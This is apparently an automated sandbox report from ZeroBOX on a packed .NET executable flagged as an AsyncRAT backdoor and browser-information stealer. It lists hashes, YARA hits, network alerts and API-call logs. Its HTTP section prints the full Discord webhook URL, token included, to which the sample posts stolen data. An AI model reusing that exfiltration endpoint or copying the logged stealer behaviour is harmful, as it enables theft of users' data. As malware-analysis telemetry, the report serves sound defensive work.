Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 14, 2022, 9:36 a.m.	Dec. 14, 2022, 9:40 a.m.

Size	164.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`04d076299d2b644c61c5d7b164a0b73d`
SHA256	`d98d50d83f4ff313dba073649eef4f1ba62ddc0aed2c4a37d0f96c18470312db`
CRC32	`3FBB6C9C`
ssdeep	`3072:AkzbD+AdLLb1Ux2xFj5/o+ZEwhf3NzALEl5gqRGq:AMueP5Ux2LEwhf3Nz3leq`
Yara	IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer UPX_Zero - UPX packed file

xxb.exe "C:\Users\test22\AppData\Local\Temp\xxb.exe"
2084

Name	Response	Post-Analysis Lookup
discord.com	A 162.159.137.232 A 162.159.138.232 A 162.159.128.233 A 162.159.135.232 A 162.159.136.232	162.159.128.233
api.ipify.org	A 104.237.62.212 A 64.185.227.156 CNAME api4.ipify.org A 173.231.16.76	104.237.62.212

IP Address	Status	Action
104.237.62.212	Active	Moloch
162.159.138.232	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:53673 -> 164.124.101.2:53	2035465	ET INFO Observed Discord Domain in DNS Lookup (discord .com)	Misc activity
TCP 192.168.56.103:49166 -> 162.159.138.232:443	2035463	ET INFO Observed Discord Domain (discord .com in TLS SNI)	Misc activity
TCP 192.168.56.103:49166 -> 162.159.138.232:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49162 -> 104.237.62.212:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49166 162.159.138.232:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a3:ea:27:1a:3d:e8:8c:05:5e:1c:c8:1d:59:0e:d2:f2:a1:76:4d:2e
TLS 1.2 192.168.56.103:49162 104.237.62.212:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.ipify.org	19:d7:90:9b:94:40:47:10:c8:4d:0f:e1:85:86:d5:0f:1c:15:9e:f4

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 14, 2022, 9:36 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 14, 2022, 9:36 a.m.			0	0
IsDebuggerPresent Dec. 14, 2022, 9:36 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 14, 2022, 9:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489b80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2022, 9:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 14, 2022, 9:36 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00489c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 14, 2022, 9:36 a.m.		1	1	0

One or more processes crashed (4 events)

Time & API	Arguments	Status
__exception__ Dec. 14, 2022, 9:36 a.m.	stacktrace: 0x920890 0x92077b 0x920069 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f32e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73fe74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73fe7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74071dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74071e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74071f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7407416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745cf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x748c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x748c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc e8 93 e6 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x920d03 registers.esp: 3731288 registers.edi: 3731312 registers.eax: 0 registers.ebp: 3731324 registers.edx: 195 registers.ebx: 3731556 registers.esi: 36591936 registers.ecx: 0	1
__exception__ Dec. 14, 2022, 9:36 a.m.	stacktrace: 0x925849 0x9252b3 mscorlib+0x30c9ff @ 0x728cc9ff mscorlib+0x302367 @ 0x728c2367 mscorlib+0x3022a6 @ 0x728c22a6 mscorlib+0x302261 @ 0x728c2261 mscorlib+0x30ca7c @ 0x728cca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73fc07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73f2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73fc0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7403a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 3e 0a 98 6c 83 78 04 00 0f 84 3c 02 00 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5eb00a7 registers.esp: 105247844 registers.edi: 105247908 registers.eax: 0 registers.ebp: 105247924 registers.edx: 105247812 registers.ebx: 36587832 registers.esi: 36833668 registers.ecx: 0	1
__exception__ Dec. 14, 2022, 9:36 a.m.	stacktrace: 0x925881 0x9252b3 mscorlib+0x30c9ff @ 0x728cc9ff mscorlib+0x302367 @ 0x728c2367 mscorlib+0x3022a6 @ 0x728c22a6 mscorlib+0x302261 @ 0x728c2261 mscorlib+0x30ca7c @ 0x728cca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73fc07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73f2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73fc0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7403a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 38 07 68 ff ff ff 7f 6a 00 8b cf e8 e2 e8 9f 6c exception.instruction: cmp byte ptr [edi], al exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5eb03de registers.esp: 105247876 registers.edi: 0 registers.eax: 37347856 registers.ebp: 105247924 registers.edx: 37347856 registers.ebx: 37347088 registers.esi: 37345960 registers.ecx: 1918650770	1
__exception__ Dec. 14, 2022, 9:36 a.m.	stacktrace: 0x925b33 0x9252b3 mscorlib+0x30c9ff @ 0x728cc9ff mscorlib+0x302367 @ 0x728c2367 mscorlib+0x3022a6 @ 0x728c22a6 mscorlib+0x302261 @ 0x728c2261 mscorlib+0x30ca7c @ 0x728cca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f22652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f3264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f32e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x73fc07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x73f97d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x73f97dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x73f97e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x73f2c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x73fc0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7403a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 39 09 e8 b1 b9 97 6c 89 45 c8 33 d2 89 55 dc 83 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5eb5134 registers.esp: 105247860 registers.edi: 105247908 registers.eax: 0 registers.ebp: 105247924 registers.edx: 105247828 registers.ebx: 36587832 registers.esi: 36833668 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST https://discord.com/api/webhooks/1052047387167838281/ckxOZHqDK9Fs6wm9uehtyNosd3HZGLhQFPhbdBDnWi6cl945WnENSlc0bCmlN0xY5VHH

Performs some HTTP requests (2 events)

request	GET https://api.ipify.org/
request	POST https://discord.com/api/webhooks/1052047387167838281/ckxOZHqDK9Fs6wm9uehtyNosd3HZGLhQFPhbdBDnWi6cl945WnENSlc0bCmlN0xY5VHH

Sends data using the HTTP POST Method (1 event)

request

POST https://discord.com/api/webhooks/1052047387167838281/ckxOZHqDK9Fs6wm9uehtyNosd3HZGLhQFPhbdBDnWi6cl945WnENSlc0bCmlN0xY5VHH

Allocates read-write-execute memory (usually to unpack itself) (50 out of 60 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00575000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04340000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04341000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00921000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00922000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00923000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00924000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0056b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00925000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00926000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00927000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00928000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00929000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0092a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0092d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0092e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 14, 2022, 9:36 a.m.	process_identifier: 2084 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05eb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (8 events)

